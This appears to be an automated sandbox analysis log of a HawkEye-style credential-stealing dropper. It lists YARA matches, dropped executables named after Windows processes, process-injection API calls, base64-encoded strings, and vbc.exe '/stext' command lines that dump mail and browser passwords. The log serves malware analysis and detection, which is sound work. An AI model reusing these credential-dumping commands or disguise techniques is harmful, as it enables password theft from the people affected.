                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_0040315D EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040315D
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: String function: 00A0BA9D appears 36 times
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 003EBF1F appears 42 times
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 0041A7D9 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: String function: 0071A7D9 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05295B1E NtWriteVirtualMemory,5_2_05295B1E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05295A76 NtResumeThread,5_2_05295A76
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_0529548A NtQuerySystemInformation,5_2_0529548A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_0529545C NtQuerySystemInformation,5_2_0529545C
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05295AF1 NtWriteVirtualMemory,5_2_05295AF1
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E06ABA NtResumeThread,8_2_04E06ABA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E05266 NtQuerySystemInformation,8_2_04E05266
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E06B62 NtWriteVirtualMemory,8_2_04E06B62
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E0522C NtQuerySystemInformation,8_2_04E0522C
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E06B35 NtWriteVirtualMemory,8_2_04E06B35
                    Source: aaVb1xEmrd.exe, 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.exe4 vs aaVb1xEmrd.exe
                    Source: MULTIBOT_NEWW.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: aaVb1xEmrd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows FirewallJump to behavior
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@45/38@8/4
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: WindowsUpdate.exe.5.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: taskhost.exe.1.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: MULTIBOT_NEWW.exe, 00000003.00000002.489293811.0000000000418000.00000004.00020000.sdmpBinary or memory string: bA*\AD:\1. alat hacking\buat\projek vb\baru\MultiBotNew.vbp
                    Source: MULTIBOT_NEWW.exeBinary or memory string: A*\AD:\1. alat hacking\buat\projek vb\baru\MultiBotNew.vbp
                    Source: aaVb1xEmrd.exeVirustotal: Detection: 69%
                    Source: aaVb1xEmrd.exeMetadefender: Detection: 28%
                    Source: aaVb1xEmrd.exeReversingLabs: Detection: 74%
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile read: C:\Users\user\Desktop\aaVb1xEmrd.exeJump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\aaVb1xEmrd.exe 'C:\Users\user\Desktop\aaVb1xEmrd.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe 'C:\Users\user\AppData\Local\Temp\svchost.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\taskhost.exe 'C:\Users\user\AppData\Local\Temp\taskhost.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\iExplorer.exe 'C:\Users\user\AppData\Local\Temp\iExplorer.exe'
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 176
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 176
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                    Source: unknownProcess created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: unknownProcess created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1096
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1168
                    Source: unknownProcess created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe 'C:\Users\user\AppData\Local\Temp\svchost.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\taskhost.exe 'C:\Users\user\AppData\Local\Temp\taskhost.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\iExplorer.exe 'C:\Users\user\AppData\Local\Temp\iExplorer.exe' Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe' Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05294E52 AdjustTokenPrivileges,5_2_05294E52
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05294E1B AdjustTokenPrivileges,5_2_05294E1B
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E05196 AdjustTokenPrivileges,8_2_04E05196
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_04E0515F AdjustTokenPrivileges,8_2_04E0515F
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile created: C:\Users\user\AppData\Local\Temp\nsk8DE2.tmpJump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004020A3 CoCreateInstance,MultiByteToWideChar,1_2_004020A3
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004041ED GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_004041ED
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: svchost.exe.1.dr, adiGWFtrqf.csBase64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
                    Source: taskhost.exe.1.dr, Form1.csBase64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: iExplorer.exe.1.dr, Form1.csBase64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
                    Source: WIN32.exe.4.dr, adiGWFtrqf.csBase64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
                    Source: svchost.exe.4.dr, adiGWFtrqf.csBase64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
                    Source: 4.0.svchost.exe.f30000.0.unpack, adiGWFtrqf.csBase64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
                    Source: 4.2.svchost.exe.f30000.0.unpack, adiGWFtrqf.csBase64 encoded string: 'm64gwmR0HBqjDHzUrBhPfb/YC2Q2XbDWy24DSgcmkigYit4uivnhFo8VijDcPEgMGKep3qNg8lmXDOdbYfdioJ1Cf5SzrnsaxFMaAqef5bJ7ERTgY6Est0zQmlSWXanRQ5m2Peec5ewf8N4pRDrRp0roFQ3bKb2rZ73lbPAEvhSFalCDylU4alwwQgSgHez89kRQyeAOUcd4CRimSMh14A=='
                    Source: WindowsUpdate.exe.5.dr, Form1.csBase64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.csBase64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.csBase64 encoded string: 'v7nfuLb0yV+doq0y+Yoxi/qgHH6xeH3nE5Cxy23dNk6dWXT4ZxIlJMClvYdNCBtl', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: Windows Update.exe.7.dr, Form1.csBase64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.csBase64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.csBase64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.csBase64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.csBase64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6292
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6280
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\0w96J1537j
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\iExplorer.exe
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\iExplorer.exeJump to behavior
                    Source: svchost.exe.1.dr, adiGWFtrqf.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: taskhost.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: taskhost.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: taskhost.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: taskhost.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: iExplorer.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: iExplorer.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: iExplorer.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: iExplorer.exe.1.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
